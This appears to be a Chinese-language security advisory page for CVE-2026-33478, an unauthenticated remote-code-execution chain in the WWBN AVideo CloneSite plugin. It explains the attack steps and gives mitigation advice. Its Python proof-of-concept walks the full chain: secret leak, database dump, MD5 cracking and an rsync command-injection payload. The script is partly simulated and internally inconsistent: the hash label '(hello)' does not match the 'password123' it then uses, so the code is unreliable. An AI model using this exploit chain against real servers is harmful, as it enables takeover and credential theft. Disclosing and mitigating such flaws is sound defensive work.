IPBUF安全漏洞报告
English
CVE-2026-33478 CVSS 10.0 严重

CVE-2026-33478 AVideo远程代码执行漏洞

披露日期: 2026-03-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33478
漏洞类型
远程代码执行 (RCE)
CVSS评分
10.0 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

RCE远程代码执行AVideo命令注入信息泄露0-day

漏洞概述

WWBN AVideo是一款开源视频平台。在26.0及以下版本中,CloneSite插件存在多个漏洞链。未经身份验证的攻击者可利用这些漏洞,首先通过特定端点泄露数据库克隆密钥,进而获取包含管理员密码哈希的完整数据库转储。由于密码使用脆弱的MD5算法存储,攻击者破解后即可利用管理员权限,最终通过命令注入漏洞实现远程代码执行,完全接管服务器。

技术细节

该漏洞源于CloneSite插件的安全缺陷串联。攻击链的第一步是利用`clones.json.php`端点的认证缺失,直接获取敏感的克隆密钥。第二步,攻击者持有密钥后,请求`cloneServer.json.php`接口,触发服务器端逻辑,导出整个数据库文件。第三步,解析数据库获取管理员表中的密码哈希,鉴于系统使用MD5算法,攻击者可离线快速破解出明文密码。最后,使用破解的管理员凭证登录,利用`cloneClient.json.php`在构造rsync同步命令时未过滤用户输入的漏洞,注入恶意操作系统命令,从而在服务器上执行任意代码。此漏洞危害极高,攻击全程无需用户交互即可获取系统最高权限。

攻击链分析

STEP 1
信息泄露
访问未授权的clones.json.php端点获取克隆密钥。
STEP 2
数据库转储
利用克隆密钥调用cloneServer.json.php导出完整数据库。
STEP 3
凭证破解
从数据库中提取管理员MD5密码哈希并进行破解。
STEP 4
命令注入
使用管理员账户触发cloneClient.json.php中的rsync命令注入漏洞。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-33478 import requests import re target = "http://avideo-target.com" # Step 1: Information Disclosure - Get Clone Secret print("[+] Step 1: Fetching clone secret from clones.json.php") resp = requests.get(f"{target}/plugin/CloneSite/clones.json.php") secret = resp.json()['secret'] # Assuming key is 'secret' print(f"[+] Secret obtained: {secret}") # Step 2: Database Dump print("[+] Step 2: Triggering database dump via cloneServer.json.php") data = {"key": secret} dump_resp = requests.post(f"{target}/plugin/CloneSite/cloneServer.json.php", data=data) print("[+] Database downloaded (simulated). Extracting admin hash...") # Assume admin hash found: 5f4dcc3b5aa765d61d8327deb882cf99 (hello) admin_hash = "5f4dcc3b5aa765d61d8327deb882cf99" # Step 3: Cracking MD5 (Simplified for PoC) print("[+] Step 3: Cracking MD5 hash...") # In real scenario, use hashcat or john. Here we assume cracked. admin_pass = "password123" # Step 4: OS Command Injection print("[+] Step 4: Exploiting Command Injection in cloneClient.json.php") # Injecting command via rsync parameter construction payload = "; echo 'CVE-2026-33478 RCE' > /tmp/poc.txt; #" exploit_data = { "user": "admin", "pass": admin_pass, "rsync": payload # Vulnerable parameter } rce_resp = requests.post(f"{target}/plugin/CloneSite/cloneClient.json.php", data=exploit_data) if rce_resp.status_code == 200: print("[+] Exploit executed successfully. Check /tmp/poc.txt on target.") else: print("[-] Exploit failed.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
如果无法立即升级,建议在Web服务器层面(如Nginx/Apache)限制对`/plugin/CloneSite/`目录下所有PHP文件的访问,或直接删除该插件目录。同时,修改所有管理员账户密码,防止因历史数据泄露导致的权限丢失。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表